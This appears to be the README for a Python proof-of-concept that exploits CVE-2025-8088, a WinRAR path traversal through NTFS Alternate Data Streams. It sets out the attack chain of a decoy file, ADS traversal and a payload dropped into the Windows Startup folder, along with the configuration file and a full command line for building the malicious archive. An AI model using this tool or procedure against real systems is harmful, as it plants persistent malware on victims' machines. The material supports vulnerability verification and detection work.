_______ ________ ___ ____ ___ ______ ____ ____ ____ ____
/ ____/ | / / ____/ |__ \ / __ \__ \ / ____/ ( __ )/ __ \( __ )( __ )
/ / | | / / __/________/ // / / /_/ //___ \______/ __ / / / / __ / __ |
/ /___ | |/ / /__/_____/ __// /_/ / __/____/ /_____/ /_/ / /_/ / /_/ / /_/ /
\____/ |___/_____/ /____/\____/____/_____/ \____/\____/\____/\____/
Educational proof-of-concept for CVE-2025-8088 — WinRAR path traversal via NTFS Alternate Data Streams (ADS)
Quick Start · Vulnerability Overview · Usage · Configuration · FAQ · Disclaimer
CVE-2025-8088 is a critical path traversal vulnerability in WinRAR that allows attackers to write arbitrary files to sensitive system locations when a victim extracts a crafted RAR archive. The exploit abuses NTFS Alternate Data Streams (ADS) — the colon (:) character in ADS syntax bypasses WinRAR's extraction directory validation, enabling payload deployment outside the intended folder.
| Detail | Value |
|---|---|
| CVE ID | CVE-2025-8088 |
| CVSS v3.1 | 8.8 (HIGH) |
| CVSS v4.0 | 8.4 (HIGH) |
| Affected | WinRAR ≤ 7.12, UnRAR.dll, portable source (Windows only) |
| Patched | WinRAR 7.13 (July 30, 2025) |
| Discovered | July 18, 2025 by ESET Research |
| Attribution | RomCom / Storm-0978 / Tropical Scorpius / UNC2596 |
| CISA KEV | Added to Known Exploited Vulnerabilities catalog |
| Vector | Crafted RAR archive → extract → payload in Startup folder |
- Attacker crafts a RAR archive containing a decoy file with ADS-embedded payload
- ADS filenames use
..\..\path traversal segments to escape the extraction directory - Target path:
AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ - Victim extracts the archive in any folder — payload silently lands in Windows Startup
- On next reboot, the payload executes automatically
Between July 18-21, 2025, the Russia-aligned threat group RomCom (also tracked as Storm-0978, Tropical Scorpius) deployed this vulnerability in spearphishing campaigns targeting financial, manufacturing, defense, and logistics companies in Europe and Canada. At least 8 threat groups subsequently weaponized the exploit. ESET reported the vulnerability on July 24; WinRAR 7.13 was released on July 30, 2025.
| # | Resource | Link |
|---|---|---|
| 1 | NVD Entry | nvd.nist.gov/vuln/detail/CVE-2025-8088 |
| 2 | ESET Research | welivesecurity.com — WinRAR zero-day |
| 3 | WinRAR Changelog | rarlab.com |
| 4 | Qualys Threat Advisory | threatprotect.qualys.com |
| 5 | AhnLab ASEC Advisory | asec.ahnlab.com |
| Exploit Engine | |
| ✅ | Path traversal via NTFS Alternate Data Streams (ADS) |
| ✅ | Configurable traversal depth (--max_up, default 16 levels) |
| ✅ | Auto-discovery of rar.exe in standard WinRAR paths |
| ✅ | Custom decoy file creation (auto-generated if missing) |
| ✅ | Payload injection into Windows Startup folder path |
| Interface | |
| ✅ | Interactive terminal interface with colorama colors |
| ✅ | Interactive settings menu for all PoC parameters |
| ✅ | About screen with full CVE technical details |
| ✅ | Sample payload generator (harmless payload.bat) |
| Safety | |
| ✅ | Persistent JSON configuration (config.json) |
| ✅ | Validation — requires drop folder and payload before execution |
| ✅ | Direct CLI mode with argparse for scripted usage |
| Dependency | Version | Purpose |
|---|---|---|
| Python | 3.6+ | Runtime |
| WinRAR | ≤ 7.12 (vulnerable) | rar.exe for archive creation |
| Windows NTFS | Required | ADS support (not FAT32/exFAT) |
| colorama | ≥ 0.4.6 | Terminal color output |
git clone <repository-url>
cd CVE-2025-8088
python launcher.pySelect [1] Install Dependencies from the menu to install colorama.
All settings are stored in config.json and editable from the launcher menu (option [2]) or manually:
{
"decoy": "resume.txt",
"payload": "payload.bat",
"drop": "C:\\Users\\Public\\Documents",
"rar": "",
"out": "cve-2025-8088-sxy-poc.rar",
"workdir": ".",
"placeholder_len": 0,
"max_up": 16,
"base_out": ""
}| Key | Description | Default |
|---|---|---|
decoy |
Decoy file shown to victim (created if missing) | resume.txt |
payload |
Payload file to embed (BAT, LNK, DLL, EXE) | payload.bat |
drop |
Benign extraction folder (absolute path) | "" |
rar |
Path to rar.exe (empty = auto-discover) |
"" |
out |
Output RAR archive filename | cve-2025-8088-sxy-poc.rar |
workdir |
Working directory for temp files | . |
max_up |
Number of .. traversal levels |
16 |
╔══════════════════════════════════════════════════════════╗
║ CVE-2025-8088 WinRAR Path Traversal PoC [CYBER] ║
╚══════════════════════════════════════════════════════════╝
┌─ ACTIONS ──────────────────────────────────────────────┐
│ [1] Install Dependencies │
│ [2] Settings │
│ [3] About │
│ [4] Run PoC │
│ [5] Usage / Help │
│ [6] Create Sample Payload │
│ [0] Exit │
└────────────────────────────────────────────────────────┘
| Option | Action |
|---|---|
1 |
Install colorama and verify WinRAR presence |
2 |
Configure decoy, payload, drop folder, rar path, traversal depth |
3 |
Display CVE technical details and attribution info |
4 |
Generate malicious RAR archive with embedded ADS payload |
5 |
Show CLI usage and argument reference |
6 |
Create a harmless sample payload.bat for testing |
0 |
Exit |
python poc.py --decoy resume.txt --payload payload.bat --drop "C:\Users\you\Documents" --rar "C:\Program Files\WinRAR\rar.exe" --out poc-output.rar --max_up 16| Argument | Required | Description |
|---|---|---|
--decoy |
Yes | Path to decoy file (auto-created if missing) |
--payload |
Yes | Path to payload file (BAT, LNK, DLL, etc.) |
--drop |
Yes | Absolute path to benign extraction folder |
--rar |
No | Path to rar.exe (auto-discovered if omitted) |
--out |
No | Output RAR filename |
--workdir |
No | Working directory |
--max_up |
No | Number of .. traversal segments (default: 16) |
CVE-2025-8088/
├── main.py # Entry point — sets CMD title/color, launches menu
├── launcher.py # Terminal interface — settings, about, run
├── poc.py # Core PoC engine — ADS creation, RAR generation
├── config.json # Persistent settings (auto-created)
├── requirements.txt # Python dependencies (colorama)
└── README.md # This file
Does this work on Linux or macOS?
No. CVE-2025-8088 exploits NTFS Alternate Data Streams, which is a Windows-specific filesystem feature. The vulnerability does not affect Linux/Unix builds of WinRAR or RAR for Android. The PoC requires Windows NTFS and rar.exe.
Is WinRAR 7.13 safe?
Yes. RARLAB patched CVE-2025-8088 in WinRAR 7.13, released July 30, 2025. Update immediately if you are running version 7.12 or earlier.
Why does the PoC target the Startup folder?
The Windows Startup folder (AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\) is a well-known persistence mechanism — any executable placed there runs automatically on user login. This is the same technique used by RomCom in their real-world campaigns.
Can this be detected by antivirus?
Modern EDR solutions and updated antivirus signatures may detect the crafted RAR archive or the ADS traversal pattern. However, at the time of initial exploitation (July 2025), the technique was a zero-day with no signatures. This PoC is for educational verification of detection capabilities.
What is the "sample payload"?
Option [6] creates a harmless payload.bat that simply prints a message and pauses. It is designed for safe testing — it does not perform any malicious actions.
Who discovered this vulnerability?
ESET Research discovered CVE-2025-8088 on July 18, 2025, while analyzing spearphishing campaigns by the RomCom group (also known as Storm-0978, Tropical Scorpius, UNC2596). The vulnerability was reported to RARLAB on July 24, with a patch released on July 30.
This proof-of-concept is provided strictly for educational and authorized security research purposes.
- Do NOT use this tool against systems you do not own or have explicit written permission to test.
- The author assumes no liability for misuse, damage, or legal consequences arising from use of this tool.
- This PoC is intended for vulnerability verification, detection engineering, and security awareness training.
- Unauthorized use of exploit code may violate computer fraud laws in your jurisdiction.
- Update WinRAR to version 7.13 or later to mitigate this vulnerability.
If this PoC helped your research, consider leaving a star ⭐
Responsible disclosure saves lives. Patch your software.
